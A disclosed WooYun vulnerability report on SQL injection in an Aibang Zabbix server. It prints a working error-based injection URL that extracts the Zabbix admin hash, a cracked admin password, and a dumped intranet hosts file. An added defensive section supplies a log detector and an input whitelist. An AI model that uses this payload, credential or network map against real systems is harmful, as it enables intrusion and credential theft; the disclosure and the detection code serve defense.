
Vulnerability summary

Defect ID: wooyun-2015-0164825

Title: SQL injection on an Aibang site allows intranet probing

Vendor: Aibang

Author: _Thorns

Submitted: 2015-12-26 09:48

Fixed: 2016-02-09 23:29

Published: 2016-02-09 23:29

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-12-26: Details sent to the vendor; awaiting vendor handling
2015-12-28: Vendor has confirmed; details disclosed to the vendor only
2016-01-07: Details disclosed to core white hats and relevant domain experts
2016-01-17: Details disclosed to regular white hats
2016-01-27: Details disclosed to intern white hats
2016-02-09: Details disclosed to the public

Brief description:

An injection on an Aibang site can lead to intranet penetration.

Detailed description:

Intranet access is possible; see:
WooYun: Roaming Aibang's intranet and controlling multiple servers (combined exploitation of several security weaknesses)
URL:http://60.28.205.210/zabbix/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29

1.png


The Zabbix instance is injectable; cracking the extracted hash cost 1 mao (0.1 yuan):
admin P@ssword199
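The report only quotes the injected URL and the resulting data. As an added example (not code from the report, from Zabbix, or from Aibang), the following Python script shows the two things a defender would build from that URL: a detector that pulls request targets out of web server access logs, URL-decodes them and matches the characteristic fragments of this error-based technique (`floor(rand(0)*2)`, `GROUP BY` on the derived-table alias, `information_schema`, `SELECT COUNT(*),CONCAT(`), and the root-cause input check that `applications` must be a plain integer. The log lines are constructed samples (the second one carries the exact path and query from the report), and the extra parameter names `groupid` and `hostid` are assumptions for illustration.

```python
"""Detect the error-based MySQL injection pattern shown in this report in
web server access logs, and show the input check that would have blocked it.

Added example for this page; not code from Zabbix, Aibang or the report's
author. The log lines below are constructed samples.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Fragments characteristic of the double-query / floor(rand(0)*2) error-based
# technique in the report's URL. Matched against the URL-decoded,
# whitespace-normalised, lower-cased query string.
SQLI_PATTERNS = [
    re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)"),
    re.compile(r"group\s+by\s+\w+\s*\)"),
    re.compile(r"information_schema\."),
    re.compile(r"select\s+count\s*\(\s*\*\s*\)\s*,\s*concat\s*\("),
]

# Parameters of zabbix/httpmon.php that must be integers. The report shows the
# injection in `applications`; `groupid` and `hostid` are assumed names.
INT_PARAMS = {"applications", "groupid", "hostid"}

# Apache/nginx "combined" log format: only the request target is needed.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log; line 2 reproduces the path and query from the report.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Dec/2015:09:40:01 +0800] "GET /zabbix/httpmon.php?applications=2 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [26/Dec/2015:09:41:17 +0800] "GET /zabbix/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 HTTP/1.1" 200 2210',
    '10.0.0.5 - - [26/Dec/2015:09:42:03 +0800] "GET /zabbix/index.php HTTP/1.1" 200 3300',
]


def normalise(query: str) -> str:
    """URL-decode twice (to catch double encoding), collapse whitespace, lower-case."""
    decoded = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", decoded).lower()


def is_valid_int_param(value: str) -> bool:
    """Root-cause check: an id parameter is a non-negative integer and nothing else."""
    return value.isdigit()


def analyse_target(target: str) -> dict:
    """Return findings for one request target of the form path?query."""
    parts = urlsplit(target)
    norm = normalise(parts.query)
    signatures = [p.pattern for p in SQLI_PATTERNS if p.search(norm)]
    bad_params = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name in INT_PARAMS and not all(is_valid_int_param(v) for v in values):
            bad_params.append(name)
    return {
        "path": parts.path,
        "signatures": signatures,
        "invalid_int_params": bad_params,
        "suspicious": bool(signatures) or bool(bad_params),
    }


def scan_log(lines):
    """Yield (line_number, findings) for every suspicious request in the log."""
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        findings = analyse_target(m.group("target"))
        if findings["suspicious"]:
            yield n, findings


def scan_sample() -> list:
    """Run the detector over the constructed sample log."""
    return list(scan_log(SAMPLE_LOG))


if __name__ == "__main__":
    for n, f in scan_sample():
        print(f"line {n}: {f['path']} signatures={len(f['signatures'])} "
              f"invalid_int_params={f['invalid_int_params']}")
```

Only the second sample line is flagged: all four signatures match, and the `applications` value fails the integer check, which is the check the endpoint itself should have applied before the value reached the query. The signature list catches this particular technique; the integer check catches every non-numeric value for the parameter regardless of technique, so in a real deployment the parameter whitelist matters more than the pattern list.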

1.png


Result of "wooyun"
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
60.28.205.198 mail.aibang.com mail libai
60.28.205.198 mail.aibang.com web libai
192.168.2.1 mail.aibang.com inmail libai
192.168.2.2 dufu
192.168.2.3 dumu
192.168.2.4 hanyu
192.168.2.5 wangwei
192.168.2.6 wangbo
192.168.2.8 jiadao
192.168.2.9 zhangji
192.168.2.10 yuanzhen
192.168.2.11 cuihao
192.168.2.12 wanghan
192.168.2.13 gaoshi
192.168.2.14 lulun
192.168.2.15 weizhuang
192.168.2.16 censhen
192.168.2.17 changjian
192.168.2.18 mengjiao
192.168.2.19 zhangxu
192.168.2.20 lishangyin
192.168.2.21 baijuyi
192.168.2.22 liuzongyuan
192.168.2.23 menghaoran
192.168.2.24 luobinwang
192.168.2.25 wangchangling
192.168.2.26 hezhizhang
192.168.2.27 chenziang
192.168.2.28 liuyuxi
192.168.2.29 wentingyun
192.168.2.30 songzhiwen
192.168.2.31 wangzhihuan
192.168.2.32 weiyingwu
192.168.2.33 zhangjiuling
192.168.2.34 liuchangqing
192.168.2.35 zhuxi
192.168.2.36 taoyuanming
192.168.2.37 liuyong
192.168.2.38 luyou
192.168.2.39 yanshu
192.168.2.40 jiangkui
192.168.2.41 ouyangxiu
192.168.2.42 suxun
192.168.2.43 suzhe
192.168.2.44 zengkong
192.168.2.45 shenkuo
192.168.2.46 fanzhongyan
192.168.2.47 wentianxiang
192.168.2.48 xinqiji
192.168.2.49 guanhanqing
192.168.2.50 wangshipu
192.168.2.51 zhangyanghao
192.168.2.66 suweidao
192.168.2.68 liduan
192.168.2.61 zhubajie
192.168.2.64 shaseng
192.168.2.93 liubei
192.168.2.94 zhugeliang
192.168.2.95 sunquan
192.168.2.96 caocao
192.168.2.100 sushi
192.168.2.101 liqingzhao
192.168.2.102 wanganshi
192.168.2.103 liyu
192.168.2.104 lijing
192.168.2.75 Amail
192.168.2.76 Bmail
192.168.2.77 Cmail
192.168.2.78 Dmail
192.168.2.79 Email
192.168.2.80 Fmail
192.168.2.81 Gmail
192.168.2.82 Hmail
192.168.2.83 Imail
192.168.2.84 Jmail
192.168.2.85 Kmail
192.168.2.86 Lmail
192.168.2.87 Mmail
192.168.2.88 Nmail
192.168.2.89 Omail
192.168.2.90 Pmail
192.168.2.200 qmail
192.168.2.201 rmail
192.168.2.202 smail
192.168.2.203 tmail
192.168.2.204 umail
192.168.2.205 vmail
192.168.2.206 wmail
192.168.2.207 xmail
192.168.2.208 ymail
192.168.2.209 zmail
192.168.2.210 0mail
192.168.2.211 1mail
192.168.2.212 2mail
192.168.2.213 3mail
192.168.2.214 4mail
192.168.2.215 5mail
192.168.2.216 6mail
192.168.2.217 7mail
192.168.2.218 8mail
192.168.2.219 9mail
192.168.2.220 10mail
192.168.2.221 11mail
192.168.2.222 12mail
192.168.2.223 13mail
192.168.2.224 14mail
192.168.2.225 15mail
192.168.2.226 16mail
60.28.211.171 liuyuxi
218.241.181.5 mail.hollycrm.com
58.211.82.9 www.hnticai.com

Proof of vulnerability:


Remediation:

Copyright notice: please credit the source when reposting: _Thorns@WooYun


Vulnerability response

Vendor response:

Severity: High

Rank: 20

Confirmed: 2015-12-28 14:28

Vendor reply:

Very serious; our company's SAs' security awareness still needs to improve. Thank you.

Latest status:

None yet

